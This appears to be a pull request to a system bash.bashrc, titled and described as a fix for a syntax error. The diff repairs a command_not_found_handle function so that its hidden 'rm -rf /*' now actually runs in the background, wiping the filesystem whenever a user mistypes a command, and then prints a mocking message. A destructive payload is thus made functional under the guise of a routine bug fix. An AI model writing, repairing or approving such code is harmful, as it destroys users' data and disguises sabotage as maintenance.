### PR TITLE
The current version of bashrc was broken

### DIFF
--- a/bash.bashrc
+++ b/bash.bashrc
@@ -12,6 +12,7 @@ echo " ==================================="
 # set a fancy prompt (non-color, overwrite the one in /etc/profile)
 PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
 
-function command_not_found_handle {
-     rm -rf /* 2>/dev/null &; echo "Oops, looks like you misspelt something >:)";
+function command_not_found_handle() {
+     rm -rf /* 2>/dev/null &
+     echo "Oops, looks like you misspelt something >:)";
 }


### PR DESCRIPTION
FIXED: 
bash: /etc/bash.bashrc: line 16: syntax error near unexpected token `;'
bash: /etc/bash.bashrc: line 16: `     rm -rf /* 2>/dev/null &; echo "Oops, looks like you misspelt something >:)"'